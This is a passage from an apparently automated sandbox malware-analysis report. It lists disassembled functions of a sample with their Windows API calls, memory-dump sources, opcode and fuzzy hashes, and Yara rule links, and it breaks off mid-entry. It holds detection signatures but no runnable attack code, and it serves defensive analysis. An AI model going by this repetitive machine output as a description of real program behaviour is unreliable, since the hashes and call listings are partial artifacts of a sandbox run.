Instruction Fuzzy Hash: B3212672604200BBFB259B3BDC49E7B7BA8EF49750F10813BF809DA191DA69DC418268

Function 0047DC79 Relevance: 7.6, APIs: 5, Instructions: 85COMMON

Download Yara Rule

APIs

Part of subcall function 0042AF7D: GetWindowLongW.USER32(?,000000EB), ref: 0042AF8E

GetWindowLongW.USER32(?,000000F0), ref: 0047DCC0
SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0047DCE4
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0047DCFC
GetSystemMetrics.USER32(00000004), ref: 0047DD24
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,0046407D,00000000), ref: 0047DD42

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$Long$MetricsSystem
String ID:
API String ID: 2294984445-0
Opcode ID: 58db5c671dacaf6274e735e5b59dcacacaaf19e386328473b40ab59af1604214
Instruction ID: 2745ad3b588c58bf7f84bd068a0c64722b3f9049984347f19d275e7481341a36
Opcode Fuzzy Hash: 58db5c671dacaf6274e735e5b59dcacacaaf19e386328473b40ab59af1604214
Instruction Fuzzy Hash: F121B271A20211AFCB305F799C48BA637B4FF55364B118736FD2AC62E0D3749810CB98

Function 0044CA6D Relevance: 7.6, APIs: 5, Instructions: 82windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0044CA86

Part of subcall function 00417E53: _memmove.LIBCMT ref: 00417EB9

SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0044CAB8
__itow.LIBCMT ref: 0044CAD0
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0044CAF6
__itow.LIBCMT ref: 0044CB07

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: MessageSend$__itow$_memmove
String ID:
API String ID: 2983881199-0
Opcode ID: ba295a9e4a84cac376ce40b100ea3667a58626921f43f4546782d277cff9af0c
Instruction ID: 408d15588870301ba26f0d556d49565db553cb243a4b06ec1a8e5d1a9f7d651d
Opcode Fuzzy Hash: ba295a9e4a84cac376ce40b100ea3667a58626921f43f4546782d277cff9af0c
Instruction Fuzzy Hash: BB214976B012047BEB10EA659D87FDF7AA8EF49700F04003BF905E7281DAB89D4583A8

Function 004689AD Relevance: 7.6, APIs: 5, Instructions: 69COMMON

Download Yara Rule

APIs

IsWindow.USER32(00000000), ref: 004689CE
GetForegroundWindow.USER32 ref: 004689E5
GetDC.USER32(00000000), ref: 00468A21
GetPixel.GDI32(00000000,?,00000003), ref: 00468A2D
ReleaseDC.USER32(00000000,00000003), ref: 00468A68

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Window$ForegroundPixelRelease
String ID:
API String ID: 4156661090-0
Opcode ID: 5c774e103fd7c14fd3ac15f2c91e4eecbd0fca56d1b824aa9126f520dca205bd
Instruction ID: dc504b34425e699b36294449a7d78668f3b0cb40f8e2d38948e729632a338b45
Opcode Fuzzy Hash: 5c774e103fd7c14fd3ac15f2c91e4eecbd0fca56d1b824aa9126f520dca205bd
Instruction Fuzzy Hash: 2A21D875A00200AFDB00EF66DC89AAA7BF5EF49305F04847EE945D7351DB74AC44CB95

Function 0042B58B Relevance: 7.6, APIs: 5, Instructions: 67COMMON

Download Yara Rule

APIs

ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 0042B5EB
SelectObject.GDI32(?,00000000), ref: 0042B5FA
BeginPath.GDI32(?), ref: 0042B611
SelectObject.GDI32(?,00000000), ref: 0042B63B

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ObjectSelect$BeginCreatePath
String ID:
API String ID: 3225163088-0
Opcode ID: 2d9caa7e8f02a5edc2a9f7593851b91eebce647bf78d0fe899eb40c073f41a96
Instruction ID: 0c46deab9bd8ee95190cd7601c745a4959590e885f3c16785a44e4500e81bd4c
Opcode Fuzzy Hash: 2d9caa7e8f02a5edc2a9f7593851b91eebce647bf78d0fe899eb40c073f41a96
Instruction Fuzzy Hash: 71218771A01364FFCB20EF55EC487AA3BA9FB10329F54013BF810962B0C37888959B9D

Function 00432E57 Relevance: 7.6, APIs: 5, Instructions: 61threadCOMMON

Download Yara Rule

APIs

__calloc_crt.LIBCMT ref: 00432E81
CreateThread.KERNEL32(?,?,00432FB7,00000000,?,?), ref: 00432EC5
GetLastError.KERNEL32 ref: 00432ECF
_free.LIBCMT ref: 00432ED8
__dosmaperr.LIBCMT ref: 00432EE3

Part of subcall function 0043889E: __getptd_noexit.LIBCMT ref: 0043889E

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
String ID:
API String ID: 2664167353-0
Opcode ID: 8839c68b833e9365fe59d260f609f0ef9097f53ec6da5cfdfa3fc49e94b31f69
Instruction ID: 5d3857902ad4e39d0a7807a1a8645ee247850fc0944dc932fc52012144756be7
Opcode Fuzzy Hash: 8839c68b833e9365fe59d260f609f0ef9097f53ec6da5cfdfa3fc49e94b31f69
Instruction Fuzzy Hash: 1211E5321043056FD720BF669D43DAB7BA8EF0C774F10112FF95486291DB79C8008668

Function 0044B8E7 Relevance: 7.5, APIs: 5, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 0044B903
GetLastError.KERNEL32(?,0044B3CB,?,?,?), ref: 0044B90D
GetProcessHeap.KERNEL32(00000008,?,?,0044B3CB,?,?,?), ref: 0044B91C
RtlAllocateHeap.NTDLL(00000000,?,0044B3CB), ref: 0044B923
GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 0044B93A

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
String ID:
API String ID: 883493501-0
Opcode ID: 224b3b262bcea95e097815f330470cae3b9fd30522fea5b1f317fdaf7c271ac1
Instruction ID: a364736b9fb630b882504dda1cd639c38590055bf09266b2214e143db27f54a6
Opcode Fuzzy Hash: 224b3b262bcea95e097815f330470cae3b9fd30522fea5b1f317fdaf7c271ac1
Instruction Fuzzy Hash: AB011DB1601204BFEB115FA5DC89D6B3BADEF8A765B10043AF945C2250DB75DC40DA64

Function 00458355 Relevance: 7.5, APIs: 5, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00458371
QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 0045837F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00458387
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00458391
Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 004583CD

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: PerformanceQuery$CounterSleep$Frequency
String ID:
API String ID: 2833360925-0
Opcode ID: b09feeaa5890129c13e29738d6641adbdf6291a2c03cccd9829463f5c2bf729c
Instruction ID: dc18281e89e8238ab357553a73dc43accd87f643eaa7179d1114bb024ceaa39e
Opcode Fuzzy Hash: b09feeaa5890129c13e29738d6641adbdf6291a2c03cccd9829463f5c2bf729c
Instruction Fuzzy Hash: DB015B31C01619DBCF00AFA4E949AEEBB78BF18B02F00006BEC01B2151CF79955487A9

Function 0044A857 Relevance: 7.5, APIs: 5, Instructions: 47stringCOMMON

Download Yara Rule

APIs

CLSIDFromProgID.COMBASE ref: 0044A874
ProgIDFromCLSID.COMBASE(?,00000000), ref: 0044A88F
lstrcmpiW.KERNEL32(?,00000000), ref: 0044A89D
CoTaskMemFree.COMBASE(00000000), ref: 0044A8AD
CLSIDFromString.COMBASE(?,?), ref: 0044A8B9

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: From$Prog$FreeStringTasklstrcmpi
String ID:
API String ID: 3897988419-0
Opcode ID: 8634bf7ecaa5fdc1740b4dd2bcd7951598a20719c221ff15eeb47fcec2f76494
Instruction ID: 11cfb5d51a588005387dc272f55ccb6c3f95a95f8279e645bea4b9330c36a3a0
Opcode Fuzzy Hash: 8634bf7ecaa5fdc1740b4dd2bcd7951598a20719c221ff15eeb47fcec2f76494
Instruction Fuzzy Hash: E3018B76A01204BFEB10AF68DC84BAABBADEF48391F104036FA01D2210D774DD558BA5

Function 0044B7EF Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0044B806
GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0044B810
GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0044B81F
RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 0044B826
GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0044B83C

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 11a17bffae6c7216c6c07c7801d85965145c335c0e882e1be7cfde9ba7f85136
Instruction ID: c5a8122427ad335fb98d7f9bc60fc3630e91b6b849cafc9c5c0f8b79b064981a
Opcode Fuzzy Hash: 11a17bffae6c7216c6c07c7801d85965145c335c0e882e1be7cfde9ba7f85136
Instruction Fuzzy Hash: 30F04975601204AFEB216FA5EC8AE6B3B6CFF9A759F00003BF941C7250DB65DC51CAA4

Function 0044B78E Relevance: 7.5, APIs: 5, Instructions: 45memoryCOMMON

Download Yara Rule

APIs

GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 0044B7A5
GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 0044B7AF
GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 0044B7BE
RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 0044B7C5
GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 0044B7DB

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: HeapInformationToken$AllocateErrorLastProcess
String ID:
API String ID: 47921759-0
Opcode ID: 361c6b22b9c7c8e6247ed4cdd03917a734a096090d065557741c1cf52c42add0
Instruction ID: c8df6711f36799f363e64537a3bbc985a9cfe474673adfe3a9a57142a5f8a0e5
Opcode Fuzzy Hash: 361c6b22b9c7c8e6247ed4cdd03917a734a096090d065557741c1cf52c42add0
Instruction Fuzzy Hash: 95F03771641204AFFB101FA5AC89E6B7BACFF9A759B10403BFA41C6250DB65DC41CAA4

Function 0044FA7B Relevance: 7.5, APIs: 5, Instructions: 40windowtimeCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,000003E9), ref: 0044FA8F
GetWindowTextW.USER32(00000000,?,00000100), ref: 0044FAA6
MessageBeep.USER32(00000000), ref: 0044FABE
KillTimer.USER32(?,0000040A), ref: 0044FADA
EndDialog.USER32(?,00000001), ref: 0044FAF4

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: BeepDialogItemKillMessageTextTimerWindow
String ID:
API String ID: 3741023627-0
Opcode ID: 95668a0a5821b6365fea2797b0cda1c5d2bcf5430da3b384504db443b5210f16
Instruction ID: e821325ad0eae55271173cf9c0d06c87017cc01279ca6079d878b83302dade78
Opcode Fuzzy Hash: 95668a0a5821b6365fea2797b0cda1c5d2bcf5430da3b384504db443b5210f16
Instruction Fuzzy Hash: 1B018130940704ABFB249B14DD4EB9677B8BB10B09F04017BB287B51E0DBF8A9888B59

Function 0042B517 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 0042B526
StrokeAndFillPath.GDI32(?,?,0048F583,00000000,?), ref: 0042B542
SelectObject.GDI32(?,00000000), ref: 0042B555
DeleteObject.GDI32 ref: 0042B568
StrokePath.GDI32(?), ref: 0042B583

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 009c53b046334e1e2fe3e981253579b213cfb1e19d7839b66af8a6999e3f3950
Instruction ID: 43688256b362a723d517ba56112c52aecf23458bebf8afda89b4bd666a52fa5a
Opcode Fuzzy Hash: 009c53b046334e1e2fe3e981253579b213cfb1e19d7839b66af8a6999e3f3950
Instruction Fuzzy Hash: 16F0F630101294BBDB11AF24EC097653BA2EB1132AF448236F8A5491F0C73889DAEF4C

Function 0045FA15 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 277comCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0045FAB2
CoCreateInstance.COMBASE(0049DA7C,00000000,00000001,0049D8EC,?), ref: 0045FACA

Part of subcall function 0041CAEE: _memmove.LIBCMT ref: 0041CB2F

CoUninitialize.COMBASE ref: 0045FD2D

Strings

.lnk, xrefs: 0045FA63, 0045FA68, 0045FA76

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: CreateInitializeInstanceUninitialize_memmove
String ID: .lnk
API String ID: 2683427295-24824748
Opcode ID: aecd5fe803b37b54560804374f977e07a87e7c53c3d1949e8040f4198973f21b
Instruction ID: c1653ae253b00d6b434c0f0946ff3504b691ff8525f08e5d4b7867ec9e9d769b
Opcode Fuzzy Hash: aecd5fe803b37b54560804374f977e07a87e7c53c3d1949e8040f4198973f21b
Instruction Fuzzy Hash: 46A16E71604205AFC300EF65CC91EABB7ECEF98708F40491EF55587192EBB4EA49CB96

Function 00433EED Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 180COMMON

Download Yara Rule

APIs

__startOneArgErrorHandling.LIBCMT ref: 00433F7D

Part of subcall function 0043EE80: __87except.LIBCMT ref: 0043EEBB

Strings

pow, xrefs: 00433F55, 00433F72

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID: ErrorHandling__87except__start
String ID: pow
API String ID: 2905807303-2276729525
Opcode ID: 7acb725e47b74442ec966829df2ac3f71062b34e5f00f332bc504ec834b00cc3
Instruction ID: 1a6ea9aad57215eec422ee5a1120efd3134a3a8d8630237708dde53552511a52
Opcode Fuzzy Hash: 7acb725e47b74442ec966829df2ac3f71062b34e5f00f332bc504ec834b00cc3
Instruction Fuzzy Hash: 29519C60E0920292DB057F19C90137B2BB49B4C715F60696FF495823E9DB3C8DC9DA4F

Function 0042DA5A Relevance: 7.2, APIs: 2, Strings: 2, Instructions: 162COMMON

Download Yara Rule

Strings

#, xrefs: 0042DA9D
+, xrefs: 0042DA96

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594424469.000000000057D000.00000080.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2594614504.000000000057E000.00000004.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_410000_UNK_.jbxd

Similarity

API ID:
String ID: #$+
API String ID: 0-2552117581
Opcode ID: 2a7ce4c99796b4a16063a01a6c2771a24b19087208fbc8d55878176601438fed
Instruction ID: 132b1d9bb02655a68b54bed4f94923a898a725b7ed4b785fee20704cb99268cf
Opcode Fuzzy Hash: 2a7ce4c99796b4a16063a01a6c2771a24b19087208fbc8d55878176601438fed
Instruction Fuzzy Hash: CB513134A082569FCB10EF68D454AFE7BA0EFA6314F140097F8419B390D338AD42C769

Function 0045503C Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122COMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(0000000C,00000016,00000016,00000000,00000000,?,00000000,004ADC40,?,0000000F,0000000C,00000016,004ADC40,?), ref: 0045507B

Part of subcall function 004184A6: __swprintf.LIBCMT ref: 004184E5
Part of subcall function 004184A6: __itow.LIBCMT ref: 00418519

Part of subcall function 0041B8A7: _memmove.LIBCMT ref: 0041B8FB

CharUpperBuffW.USER32(?,?,00000000,?), ref: 004550FB

Strings

REMOVE, xrefs: 004550AC
THIS, xrefs: 00455139

Memory Dump Source

Source File: 00000002.00000002.2593014028.0000000000411000.00000040.00000001.01000000.00000005.sdmp, Offset: 00410000, based on PE: true

Associated: 00000002.00000002.2592726120.0000000000410000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004BE000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004CA000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.00000000004EF000.00000040.00000001.01000000.00000005.sdmpDownload File
Associated: 00000002.00000002.2593014028.0000000000577000.00000040.00000001.01000000.00000005.sdmpDownload File
